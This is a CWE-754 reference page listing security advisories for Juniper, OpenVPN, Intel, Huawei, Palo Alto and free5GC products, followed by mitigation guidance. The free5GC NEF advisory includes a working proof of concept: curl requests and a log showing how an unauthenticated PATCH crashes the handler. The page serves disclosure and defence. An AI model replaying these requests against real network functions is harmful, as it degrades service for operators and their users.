CWE-754
Allowed-with-ReviewImproper Check for Unusual or Exceptional Conditions
Abstraction: Class · Status: Incomplete
The product does not check or incorrectly checks for unusual or exceptional conditions that are not expected to occur frequently during day to day operation of the product.
905 vulnerabilities reference this CWE, most recent first.
GHSA-HR3Q-MVQF-HMMC
Vulnerability from github – Published: 2022-05-24 17:48 – Updated: 2022-05-24 17:48In Juniper Networks Junos OS Evolved, receipt of a stream of specific genuine Layer 2 frames may cause the Advanced Forwarding Toolkit (AFT) manager process (Evo-aftmand), responsible for handling Route, Class-of-Service (CoS), Firewall operations within the packet forwarding engine (PFE) to crash and restart, leading to a Denial of Service (DoS) condition. By continuously sending this specific stream of genuine Layer 2 frames, an attacker can repeatedly crash the PFE, causing a sustained Denial of Service (DoS). This issue affects Juniper Networks Junos OS Evolved: All versions prior to 20.4R1-EVO. This issue does not affect Junos OS versions.
{
"affected": [],
"aliases": [
"CVE-2021-0239"
],
"database_specific": {
"cwe_ids": [
"CWE-754"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-04-22T20:15:00Z",
"severity": "MODERATE"
},
"details": "In Juniper Networks Junos OS Evolved, receipt of a stream of specific genuine Layer 2 frames may cause the Advanced Forwarding Toolkit (AFT) manager process (Evo-aftmand), responsible for handling Route, Class-of-Service (CoS), Firewall operations within the packet forwarding engine (PFE) to crash and restart, leading to a Denial of Service (DoS) condition. By continuously sending this specific stream of genuine Layer 2 frames, an attacker can repeatedly crash the PFE, causing a sustained Denial of Service (DoS). This issue affects Juniper Networks Junos OS Evolved: All versions prior to 20.4R1-EVO. This issue does not affect Junos OS versions.",
"id": "GHSA-hr3q-mvqf-hmmc",
"modified": "2022-05-24T17:48:12Z",
"published": "2022-05-24T17:48:12Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-0239"
},
{
"type": "WEB",
"url": "https://kb.juniper.net/JSA11134"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-HW2V-R646-WGXR
Vulnerability from github – Published: 2025-04-12 00:30 – Updated: 2025-04-12 00:30Prisma Access Browser: Inappropriate control behavior in Prisma Access Browser
{
"affected": [],
"aliases": [
"CVE-2025-0129"
],
"database_specific": {
"cwe_ids": [
"CWE-306",
"CWE-754"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-11T23:15:28Z",
"severity": "CRITICAL"
},
"details": "Prisma Access Browser: Inappropriate control behavior in Prisma Access Browser",
"id": "GHSA-hw2v-r646-wgxr",
"modified": "2025-04-12T00:30:26Z",
"published": "2025-04-12T00:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0129"
},
{
"type": "WEB",
"url": "https://security.paloaltonetworks.com/PAN-SA-2025-0008"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:D/RE:L/U:Amber",
"type": "CVSS_V4"
}
]
}
GHSA-HXJ4-CVX4-5VG6
Vulnerability from github – Published: 2022-05-24 17:28 – Updated: 2024-04-04 03:03It was found in AMQ Online before 1.5.2 that injecting an invalid field to a user's AddressSpace configuration of the user namespace puts AMQ Online in an inconsistent state, where the AMQ Online components do not operate properly, such as the failure of provisioning and the failure of creating addresses, though this does not impact upon already existing messaging clients or brokers.
{
"affected": [],
"aliases": [
"CVE-2020-14348"
],
"database_specific": {
"cwe_ids": [
"CWE-248",
"CWE-754"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-09-16T18:15:00Z",
"severity": "MODERATE"
},
"details": "It was found in AMQ Online before 1.5.2 that injecting an invalid field to a user\u0027s AddressSpace configuration of the user namespace puts AMQ Online in an inconsistent state, where the AMQ Online components do not operate properly, such as the failure of provisioning and the failure of creating addresses, though this does not impact upon already existing messaging clients or brokers.",
"id": "GHSA-hxj4-cvx4-5vg6",
"modified": "2024-04-04T03:03:13Z",
"published": "2022-05-24T17:28:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14348"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1861814"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-J2CG-2G7J-2GM8
Vulnerability from github – Published: 2024-12-12 12:31 – Updated: 2024-12-12 12:31Out-of-bounds read vulnerability in the M3U8 module Impact: Successful exploitation of this vulnerability may cause features to perform abnormally.
{
"affected": [],
"aliases": [
"CVE-2024-54116"
],
"database_specific": {
"cwe_ids": [
"CWE-125",
"CWE-754"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-12T12:15:27Z",
"severity": "MODERATE"
},
"details": "Out-of-bounds read vulnerability in the M3U8 module\nImpact: Successful exploitation of this vulnerability may cause features to perform abnormally.",
"id": "GHSA-j2cg-2g7j-2gm8",
"modified": "2024-12-12T12:31:16Z",
"published": "2024-12-12T12:31:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-54116"
},
{
"type": "WEB",
"url": "https://consumer.huawei.com/en/support/bulletin/2024/12"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-J2F6-V4VJ-2456
Vulnerability from github – Published: 2025-07-11 18:30 – Updated: 2025-07-11 18:30An Improper Check for Unusual or Exceptional Conditions vulnerability in the flow processing daemon (flowd) of Juniper Networks Junos OS on
SRX1600, SRX2300, SRX 4000 Series, and SRX5000 Series with SPC3
allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS).
If a sequence of specific PIM packets is received, this will cause a flowd crash and restart.
This issue affects Junos OS:
- all versions before 21.2R3-S9,
- 21.4 versions before 21.4R3-S11,
- 22.2 versions before 22.2R3-S7,
- 22.4 versions before 22.4R3-S6,
- 23.2 versions before 23.2R2-S4,
- 23.4 versions before 23.4R2-S4,
- 24.2 versions before 24.2R2.
This is a similar, but different vulnerability than the issue reported as
CVE-2024-47503, published in JSA88133.
{
"affected": [],
"aliases": [
"CVE-2025-52981"
],
"database_specific": {
"cwe_ids": [
"CWE-754"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-07-11T16:15:25Z",
"severity": "HIGH"
},
"details": "An Improper Check for Unusual or Exceptional Conditions vulnerability in the flow processing daemon (flowd) of Juniper Networks Junos OS on \n\n\n\n\n\n\n\n\nSRX1600, SRX2300, SRX 4000 Series, and SRX5000 Series with SPC3\n\n\n\nallows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS).\n\nIf a sequence of specific PIM packets is received, this will cause a flowd crash and restart.\n\n\nThis issue affects Junos OS:\n\n\n\n * all versions before 21.2R3-S9,\n * 21.4 versions before 21.4R3-S11,\n * 22.2 versions before 22.2R3-S7,\n * 22.4 versions before 22.4R3-S6,\n * 23.2 versions before 23.2R2-S4,\n * 23.4 versions before 23.4R2-S4,\n * 24.2 versions before 24.2R2.\n\n\n\n\n\n\n\nThis is a similar, but different vulnerability than the issue reported as\n\nCVE-2024-47503, published in JSA88133.",
"id": "GHSA-j2f6-v4vj-2456",
"modified": "2025-07-11T18:30:33Z",
"published": "2025-07-11T18:30:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52981"
},
{
"type": "WEB",
"url": "https://supportportal.juniper.net/JSA100087"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:X/RE:M/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-J34C-6692-HX97
Vulnerability from github – Published: 2022-05-24 19:04 – Updated: 2022-09-21 00:00OpenVPN Access Server 2.7.3 to 2.8.7 allows remote attackers to trigger an assert during the user authentication phase via incorrect authentication token data in an early phase of the user authentication resulting in a denial of service.
{
"affected": [],
"aliases": [
"CVE-2020-36382"
],
"database_specific": {
"cwe_ids": [
"CWE-617",
"CWE-754"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-06-04T11:15:00Z",
"severity": "HIGH"
},
"details": "OpenVPN Access Server 2.7.3 to 2.8.7 allows remote attackers to trigger an assert during the user authentication phase via incorrect authentication token data in an early phase of the user authentication resulting in a denial of service.",
"id": "GHSA-j34c-6692-hx97",
"modified": "2022-09-21T00:00:37Z",
"published": "2022-05-24T19:04:07Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36382"
},
{
"type": "WEB",
"url": "https://openvpn.net/security-advisory/access-server-security-update-cve-2020-15077-cve-2020-36382"
},
{
"type": "WEB",
"url": "https://openvpn.net/vpn-server-resources/release-notes"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-J3FF-RVRX-2J9X
Vulnerability from github – Published: 2022-05-24 19:17 – Updated: 2022-05-24 19:17An Improper Check for Unusual or Exceptional Conditions in packet processing on the MS-MPC/MS-MIC utilized by Juniper Networks Junos OS allows a malicious attacker to send a specific packet, triggering the MS-MPC/MS-MIC to reset, causing a Denial of Service (DoS). Continued receipt and processing of this packet will create a sustained Denial of Service (DoS) condition. This issue only affects specific versions of Juniper Networks Junos OS on MX Series: 17.3R3-S11; 17.4R2-S13; 17.4R3 prior to 17.4R3-S5; 18.1R3-S12; 18.2R2-S8, 18.2R3-S7, 18.2R3-S8; 18.3R3-S4; 18.4R3-S7; 19.1R3-S4, 19.1R3-S5; 19.2R1-S6; 19.3R3-S2; 19.4R2-S4, 19.4R2-S5; 19.4R3-S2; 20.1R2-S1; 20.2R2-S2, 20.2R2-S3, 20.2R3; 20.3R2, 20.3R2-S1; 20.4R1, 20.4R1-S1, 20.4R2; 21.1R1; This issue does not affect any version of Juniper Networks Junos OS prior to 15.1X49-D240;
{
"affected": [],
"aliases": [
"CVE-2021-31351"
],
"database_specific": {
"cwe_ids": [
"CWE-754"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-10-19T19:15:00Z",
"severity": "HIGH"
},
"details": "An Improper Check for Unusual or Exceptional Conditions in packet processing on the MS-MPC/MS-MIC utilized by Juniper Networks Junos OS allows a malicious attacker to send a specific packet, triggering the MS-MPC/MS-MIC to reset, causing a Denial of Service (DoS). Continued receipt and processing of this packet will create a sustained Denial of Service (DoS) condition. This issue only affects specific versions of Juniper Networks Junos OS on MX Series: 17.3R3-S11; 17.4R2-S13; 17.4R3 prior to 17.4R3-S5; 18.1R3-S12; 18.2R2-S8, 18.2R3-S7, 18.2R3-S8; 18.3R3-S4; 18.4R3-S7; 19.1R3-S4, 19.1R3-S5; 19.2R1-S6; 19.3R3-S2; 19.4R2-S4, 19.4R2-S5; 19.4R3-S2; 20.1R2-S1; 20.2R2-S2, 20.2R2-S3, 20.2R3; 20.3R2, 20.3R2-S1; 20.4R1, 20.4R1-S1, 20.4R2; 21.1R1; This issue does not affect any version of Juniper Networks Junos OS prior to 15.1X49-D240;",
"id": "GHSA-j3ff-rvrx-2j9x",
"modified": "2022-05-24T19:17:55Z",
"published": "2022-05-24T19:17:55Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31351"
},
{
"type": "WEB",
"url": "https://kb.juniper.net/JSA11216"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-J439-PXMH-QQFX
Vulnerability from github – Published: 2022-05-24 19:04 – Updated: 2022-05-24 19:04Improper conditions check in some Intel(R) Thunderbolt(TM) controllers may allow an authenticated user to potentially enable denial of service via local access.
{
"affected": [],
"aliases": [
"CVE-2020-12292"
],
"database_specific": {
"cwe_ids": [
"CWE-754"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-06-09T19:15:00Z",
"severity": "MODERATE"
},
"details": "Improper conditions check in some Intel(R) Thunderbolt(TM) controllers may allow an authenticated user to potentially enable denial of service via local access.",
"id": "GHSA-j439-pxmh-qqfx",
"modified": "2022-05-24T19:04:30Z",
"published": "2022-05-24T19:04:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12292"
},
{
"type": "WEB",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00401.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-J4W4-W582-6GJC
Vulnerability from github – Published: 2022-05-24 17:33 – Updated: 2022-05-24 17:33Improper conditions check in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.
{
"affected": [],
"aliases": [
"CVE-2020-0588"
],
"database_specific": {
"cwe_ids": [
"CWE-754"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-11-12T18:15:00Z",
"severity": "MODERATE"
},
"details": "Improper conditions check in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.",
"id": "GHSA-j4w4-w582-6gjc",
"modified": "2022-05-24T17:33:29Z",
"published": "2022-05-24T17:33:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-0588"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20201113-0001"
},
{
"type": "WEB",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00358"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-J59F-X285-69JX
Vulnerability from github – Published: 2026-05-08 22:50 – Updated: 2026-06-08 23:47Summary
free5GC's NEF PATCH /3gpp-pfd-management/v1/{afId}/transactions/{transId}/applications/{appId} handler panics with a nil-pointer dereference when the upstream UDR call fails AND the consumer wrapper returns err != nil together with a nil *ProblemDetails. The handler's errPfdData != nil branch builds its own problemDetailsErr correctly, but immediately after it reads problemDetails.Cause (the OTHER value, which is nil in this branch) and panics. Gin recovery converts the panic into HTTP 500, so a single PATCH against this endpoint returns 500 instead of the intended controlled error response whenever UDR access is failing.
This is a second-order bug: the trigger requires UDR access to be failing (e.g. NRF or UDR is unreachable, registration broken, transient network failure). The attacker does not directly control that condition, so this is scored as AC:H. Once the upstream condition exists, the trigger is a single PATCH request and is repeatable.
The HTTP request itself in v4.2.1 is reachable without an Authorization header because the underlying NEF 3gpp-pfd-management route group is mounted without inbound auth middleware (see free5gc/free5gc#858). So in the validation lab the entire trigger chain is unauthenticated end-to-end.
Details
Validated against the NEF container in the official Docker compose lab.
- Source repo tag: v4.2.1
- Running Docker image: free5gc/nef:v4.2.1
- Runtime NEF commit: 5ce35eab
- Docker validation date: 2026-03-21 (container log timestamp 2026-03-21T03:06:36Z)
- NEF endpoint: http://10.100.200.19:8000
Vulnerable handler logic in PatchIndividualApplicationPFDManagement (paraphrased):
pdfData, problemDetails, errPfdData := p.Consumer().AppDataPfdsAppIdGet(appID)
switch {
case problemDetails != nil:
...
case errPfdData != nil:
problemDetailsErr := &models.ProblemDetails{
Status: http.StatusInternalServerError,
Detail: "Query to UDR failed",
}
c.Set(sbi.IN_PB_DETAILS_CTX_STR, problemDetails.Cause) // <-- nil deref
c.JSON(int(problemDetailsErr.Status), problemDetailsErr)
return
}
In the errPfdData != nil branch, problemDetails is by construction nil (otherwise the first case would have matched). Reading problemDetails.Cause panics with runtime error: invalid memory address or nil pointer dereference. The intended value is presumably problemDetailsErr.Cause -- the locally constructed problem-details struct.
Code evidence (paths in free5gc/nef):
- Patch handler core path:
- NFs/nef/internal/sbi/processor/pfd.go:563
- NFs/nef/internal/sbi/processor/pfd.go:610
- Panic site (nil-deref on problemDetails.Cause):
- NFs/nef/internal/sbi/processor/pfd.go:622
- Route exposure / dispatch:
- NFs/nef/internal/sbi/api_pfd.go:168
- NFs/nef/internal/sbi/api_pfd.go:188
PoC
Reproduced end-to-end against the running NEF at http://10.100.200.19:8000. The trigger requires UDR access to be failing -- the lab simulates this by stopping NRF (so NEF's UDR client fails to discover/dial UDR). In production, equivalent triggers include NRF outages, UDR outages, or transient network failures.
- Create an AF context (no Authorization header):
curl -i -X POST 'http://10.100.200.19:8000/3gpp-traffic-influence/v1/afnpd3/subscriptions' \
-H 'Content-Type: application/json' \
--data '{"afAppId":"app-nef-npd3","anyUeInd":true}'
- Create a PFD-management transaction:
curl -i -X POST 'http://10.100.200.19:8000/3gpp-pfd-management/v1/afnpd3/transactions' \
-H 'Content-Type: application/json' \
--data '{"pfdDatas":{"appnpd3":{"externalAppId":"appnpd3","pfds":{"pfd1":{"pfdId":"pfd1","flowDescriptions":["permit in ip from 10.68.28.39 80 to any"]}}}}}'
- Make UDR access fail (lab simulation):
docker stop nrf
- Trigger the panic with one PATCH:
curl -i -X PATCH 'http://10.100.200.19:8000/3gpp-pfd-management/v1/afnpd3/transactions/1/applications/appnpd3' \
-H 'Content-Type: application/json' \
--data '{"externalAppId":"appnpd3","pfds":{"pfd1":{"pfdId":"pfd1","flowDescriptions":[]}}}'
HTTP/1.1 500 Internal Server Error
Content-Length: 0
- NEF container logs (
docker logs --since 2026-03-21T03:06:36Z nef) confirm the nil-deref panic atpfd.go:622insidePatchIndividualApplicationPFDManagement:
[INFO][NEF][PFDMng] PatchIndividualApplicationPFDManagement - scsAsID[afnpd3], transID[1], appID[appnpd3]
[ERRO][NEF][GIN] panic: runtime error: invalid memory address or nil pointer dereference
github.com/free5gc/nef/internal/sbi/processor.(*Processor).PatchIndividualApplicationPFDManagement
.../pfd.go:622
github.com/free5gc/nef/internal/sbi.(*Server).apiPatchIndividualApplicationPFDManagement
.../api_pfd.go:188
[INFO][NEF][GIN] | 500 | PATCH | /3gpp-pfd-management/v1/afnpd3/transactions/1/applications/appnpd3 |
- Restore for further testing:
docker start nrf
Impact
NULL pointer dereference (CWE-476) caused by improper handling of an exceptional branch (CWE-754): the errPfdData != nil branch reads problemDetails.Cause even though problemDetails is nil by construction in that branch (the prior case already matched the non-nil case). The intended target was the locally constructed problemDetailsErr.Cause.
Gin recovery catches the panic, so the NEF process is NOT killed and other endpoints continue serving. The realized impact is per-request: PATCH against this endpoint returns 500 (with empty body and a stack trace in NEF logs) instead of the intended controlled UDR-failure response, whenever upstream UDR access is failing.
No Confidentiality impact (the response is 500 with empty body). No persistent Integrity impact (the panic happens before any state mutation). Availability impact is limited to per-request degradation and only fires while UDR access is independently broken; the attacker does not directly control that precondition, so AC:H is the honest assessment.
Affected: free5gc v4.2.1.
Upstream issue: https://github.com/free5gc/free5gc/issues/925 Upstream fix: https://github.com/free5gc/nef/pull/22
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/free5gc/nef"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.2.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44322"
],
"database_specific": {
"cwe_ids": [
"CWE-476",
"CWE-754"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-08T22:50:57Z",
"nvd_published_at": "2026-05-27T17:16:37Z",
"severity": "HIGH"
},
"details": "### Summary\nfree5GC\u0027s NEF `PATCH /3gpp-pfd-management/v1/{afId}/transactions/{transId}/applications/{appId}` handler panics with a nil-pointer dereference when the upstream UDR call fails AND the consumer wrapper returns `err != nil` together with a nil `*ProblemDetails`. The handler\u0027s `errPfdData != nil` branch builds its own `problemDetailsErr` correctly, but immediately after it reads `problemDetails.Cause` (the OTHER value, which is nil in this branch) and panics. Gin recovery converts the panic into `HTTP 500`, so a single PATCH against this endpoint returns 500 instead of the intended controlled error response whenever UDR access is failing.\n\nThis is a second-order bug: the trigger requires UDR access to be failing (e.g. NRF or UDR is unreachable, registration broken, transient network failure). The attacker does not directly control that condition, so this is scored as AC:H. Once the upstream condition exists, the trigger is a single PATCH request and is repeatable.\n\nThe HTTP request itself in v4.2.1 is reachable without an `Authorization` header because the underlying NEF `3gpp-pfd-management` route group is mounted without inbound auth middleware (see free5gc/free5gc#858). So in the validation lab the entire trigger chain is unauthenticated end-to-end.\n\n### Details\nValidated against the NEF container in the official Docker compose lab.\n- Source repo tag: `v4.2.1`\n- Running Docker image: `free5gc/nef:v4.2.1`\n- Runtime NEF commit: `5ce35eab`\n- Docker validation date: 2026-03-21 (container log timestamp `2026-03-21T03:06:36Z`)\n- NEF endpoint: `http://10.100.200.19:8000`\n\nVulnerable handler logic in `PatchIndividualApplicationPFDManagement` (paraphrased):\n```go\npdfData, problemDetails, errPfdData := p.Consumer().AppDataPfdsAppIdGet(appID)\n\nswitch {\ncase problemDetails != nil:\n ...\ncase errPfdData != nil:\n problemDetailsErr := \u0026models.ProblemDetails{\n Status: http.StatusInternalServerError,\n Detail: \"Query to UDR failed\",\n }\n c.Set(sbi.IN_PB_DETAILS_CTX_STR, problemDetails.Cause) // \u003c-- nil deref\n c.JSON(int(problemDetailsErr.Status), problemDetailsErr)\n return\n}\n```\nIn the `errPfdData != nil` branch, `problemDetails` is by construction nil (otherwise the first `case` would have matched). Reading `problemDetails.Cause` panics with `runtime error: invalid memory address or nil pointer dereference`. The intended value is presumably `problemDetailsErr.Cause` -- the locally constructed problem-details struct.\n\nCode evidence (paths in `free5gc/nef`):\n- Patch handler core path:\n - `NFs/nef/internal/sbi/processor/pfd.go:563`\n - `NFs/nef/internal/sbi/processor/pfd.go:610`\n- Panic site (nil-deref on `problemDetails.Cause`):\n - `NFs/nef/internal/sbi/processor/pfd.go:622`\n- Route exposure / dispatch:\n - `NFs/nef/internal/sbi/api_pfd.go:168`\n - `NFs/nef/internal/sbi/api_pfd.go:188`\n\n### PoC\nReproduced end-to-end against the running NEF at `http://10.100.200.19:8000`. The trigger requires UDR access to be failing -- the lab simulates this by stopping NRF (so NEF\u0027s UDR client fails to discover/dial UDR). In production, equivalent triggers include NRF outages, UDR outages, or transient network failures.\n\n1. Create an AF context (no Authorization header):\n```\ncurl -i -X POST \u0027http://10.100.200.19:8000/3gpp-traffic-influence/v1/afnpd3/subscriptions\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data \u0027{\"afAppId\":\"app-nef-npd3\",\"anyUeInd\":true}\u0027\n```\n\n2. Create a PFD-management transaction:\n```\ncurl -i -X POST \u0027http://10.100.200.19:8000/3gpp-pfd-management/v1/afnpd3/transactions\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data \u0027{\"pfdDatas\":{\"appnpd3\":{\"externalAppId\":\"appnpd3\",\"pfds\":{\"pfd1\":{\"pfdId\":\"pfd1\",\"flowDescriptions\":[\"permit in ip from 10.68.28.39 80 to any\"]}}}}}\u0027\n```\n\n3. Make UDR access fail (lab simulation):\n```\ndocker stop nrf\n```\n\n4. Trigger the panic with one PATCH:\n```\ncurl -i -X PATCH \u0027http://10.100.200.19:8000/3gpp-pfd-management/v1/afnpd3/transactions/1/applications/appnpd3\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data \u0027{\"externalAppId\":\"appnpd3\",\"pfds\":{\"pfd1\":{\"pfdId\":\"pfd1\",\"flowDescriptions\":[]}}}\u0027\n```\n```\nHTTP/1.1 500 Internal Server Error\nContent-Length: 0\n```\n\n5. NEF container logs (`docker logs --since 2026-03-21T03:06:36Z nef`) confirm the nil-deref panic at `pfd.go:622` inside `PatchIndividualApplicationPFDManagement`:\n```\n[INFO][NEF][PFDMng] PatchIndividualApplicationPFDManagement - scsAsID[afnpd3], transID[1], appID[appnpd3]\n[ERRO][NEF][GIN] panic: runtime error: invalid memory address or nil pointer dereference\ngithub.com/free5gc/nef/internal/sbi/processor.(*Processor).PatchIndividualApplicationPFDManagement\n .../pfd.go:622\ngithub.com/free5gc/nef/internal/sbi.(*Server).apiPatchIndividualApplicationPFDManagement\n .../api_pfd.go:188\n[INFO][NEF][GIN] | 500 | PATCH | /3gpp-pfd-management/v1/afnpd3/transactions/1/applications/appnpd3 |\n```\n\n6. Restore for further testing:\n```\ndocker start nrf\n```\n\n### Impact\nNULL pointer dereference (CWE-476) caused by improper handling of an exceptional branch (CWE-754): the `errPfdData != nil` branch reads `problemDetails.Cause` even though `problemDetails` is nil by construction in that branch (the prior `case` already matched the non-nil case). The intended target was the locally constructed `problemDetailsErr.Cause`.\n\nGin recovery catches the panic, so the NEF process is NOT killed and other endpoints continue serving. The realized impact is per-request: PATCH against this endpoint returns `500` (with empty body and a stack trace in NEF logs) instead of the intended controlled UDR-failure response, whenever upstream UDR access is failing.\n\nNo Confidentiality impact (the response is `500` with empty body). No persistent Integrity impact (the panic happens before any state mutation). Availability impact is limited to per-request degradation and only fires while UDR access is independently broken; the attacker does not directly control that precondition, so AC:H is the honest assessment.\n\nAffected: free5gc v4.2.1.\n\nUpstream issue: https://github.com/free5gc/free5gc/issues/925\nUpstream fix: https://github.com/free5gc/nef/pull/22",
"id": "GHSA-j59f-x285-69jx",
"modified": "2026-06-08T23:47:23Z",
"published": "2026-05-08T22:50:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-j59f-x285-69jx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44322"
},
{
"type": "WEB",
"url": "https://github.com/free5gc/free5gc/issues/925"
},
{
"type": "WEB",
"url": "https://github.com/free5gc/nef/pull/22"
},
{
"type": "WEB",
"url": "https://github.com/free5gc/nef/commit/72a47f3fab4dffbd227f8d92c5f69dca93b610cb"
},
{
"type": "PACKAGE",
"url": "https://github.com/free5gc/free5gc"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "free5GC\u0027s NEF 3gpp-pfd-management PATCH applications/{appId} panics on UDR access failure due to nil ProblemDetails dereference"
}
Mitigation MIT-3
Strategy: Language Selection
- Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
- Choose languages with features such as exception handling that force the programmer to anticipate unusual conditions that may generate exceptions. Custom exceptions may need to be developed to handle unusual business-logic conditions. Be careful not to pass sensitive exceptions back to the user (CWE-209, CWE-248).
Mitigation
Check the results of all functions that return a value and verify that the value is expected.
Mitigation
If using exception handling, catch and throw specific exceptions instead of overly-general exceptions (CWE-396, CWE-397). Catch and handle exceptions as locally as possible so that exceptions do not propagate too far up the call stack (CWE-705). Avoid unchecked or uncaught exceptions where feasible (CWE-248).
Mitigation MIT-39
- Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.
- If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.
- Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.
- Exposing additional information to a potential attacker in the context of an exceptional condition can help the attacker determine what attack vectors are most likely to succeed beyond DoS.
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
Mitigation MIT-38
If the program must fail, ensure that it fails gracefully (fails closed). There may be a temptation to simply let the program fail poorly in cases such as low memory conditions, but an attacker may be able to assert control before the software has fully exited. Alternately, an uncontrolled failure could cause cascading problems with other downstream components; for example, the program could send a signal to a downstream process so the process immediately knows that a problem has occurred and has a better chance of recovery.
Mitigation
Use system limits, which should help to prevent resource exhaustion. However, the product should still handle low resource conditions since they may still occur.
No CAPEC attack patterns related to this CWE.